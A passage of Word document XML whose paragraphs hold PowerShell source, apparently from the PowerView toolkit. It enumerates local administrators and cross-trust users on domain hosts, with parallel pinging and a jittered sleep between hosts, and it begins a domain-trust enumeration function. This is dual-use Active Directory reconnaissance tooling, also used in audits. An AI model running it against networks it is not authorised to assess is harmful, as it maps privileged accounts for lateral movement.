    <w:p w14:paraId="36752FA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ignore the builtin administrators group for a DC (S-1-5-32-544)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B145C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # TODO: ignore all default built in sids?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD9FCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Get-NetGroup -Domain $Domain -DomainController $DomainController -GroupName $_ -FullData | Where-Object { $_.objectsid -notmatch "S-1-5-32-544" } | ForEach-Object { $_.objectsid }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12787F80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C006ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68D67921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # query for the primary domain controller so we can extract the domain SID for filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1C853" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainSID = Get-DomainSID -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EC9C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAED464" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0016F406" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C28AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D14BEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A3A0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3871D78A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # optionally check if the server is up first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02669BA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D48CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8ECE18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D855598" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F31911F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B991120" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # grab the users for the local admins on this server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32E1AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($API) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0876CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName -API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C25EDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BDBCDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11036B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalAdmins = Get-NetLocalGroup -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32EDEB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE2B08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1525C9DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                # if we just want to return cross-trust users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE1C24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($DomainSID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A90C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # get the local machine SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA029BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalSID = ($LocalAdmins | Where-Object { $_.SID -match '.*-500$' }).SID -replace "-500$"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DE12C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "LocalSid for $ComputerName : $LocalSID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D642097" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # filter out accounts that begin with the machine SID and domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542FEE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    #   but preserve any groups that have users across a trust ($TrustGroupSIDS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06398052" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalAdmins = $LocalAdmins | Where-Object { ($TrustGroupsSIDs -contains $_.SID) -or ((-not $_.SID.startsWith($LocalSID)) -and (-not $_.SID.startsWith($DomainSID))) }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC7732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7595D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00029A20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($DomainOnly) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF6D80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $LocalAdmins = $LocalAdmins | Where-Object {$_.IsDomain}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78CA53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6BF7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="351C5F52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($LocalAdmins -and ($LocalAdmins.Length -ne 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81A8E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # output the results to a csv if specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35387C48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($OutFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304A701" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $LocalAdmins | Export-PowerViewCSV -OutFile $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487AAD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B15C36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B4B54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise return the user objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5827A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $LocalAdmins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B3533" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54A5D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A16EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE26F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[!] No users returned from $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229934C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10047B9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170707F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C83AC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338303A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="442F51EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666665B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0158B995" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D44107" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF705A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71160495" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BACACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D031249" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E13F14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'OutFile' = $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113DC3D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'DomainSID' = $DomainSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E3C2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'TrustGroupsSIDs' = $TrustGroupsSIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A6C7D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C4504" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E0064BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025D95E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($API) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4710A6CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ScriptParams['API'] = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB83B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54585CF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CF361FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($DomainOnly) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00034D8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ScriptParams['DomainOnly'] = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2F2DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBDD8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F6D04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25D4C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32606AC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37EC1D3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782AB706" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC69C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32AFDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F919071" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F3344" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E870D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2ACFE546" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B8952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFCEED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53E24685" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB82FCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="770E1931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E97192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00B6E927" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B1B11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA20DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB7A6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4893EA92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ScriptArgs = @($Computer, $False, $OutFile, $DomainSID, $TrustGroupsSIDs, $API, $DomainOnly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AABC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61BC02FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $ScriptArgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBE275" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB529C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CF5AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49C0DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E78E861" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F77A204" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B8F1F95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBB96CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03954A76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># Domain trust functions below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11563A61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A66D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E182A83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5023A65A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetDomainTrust {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B19E78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731917EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7604D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29F630EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return all domain trusts for the current domain or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BFF4D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a specified domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33201EBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72481B90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53565A86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32DBA038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain whose trusts to enumerate, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9E6082" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0CE91EBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D0562" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33D480CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
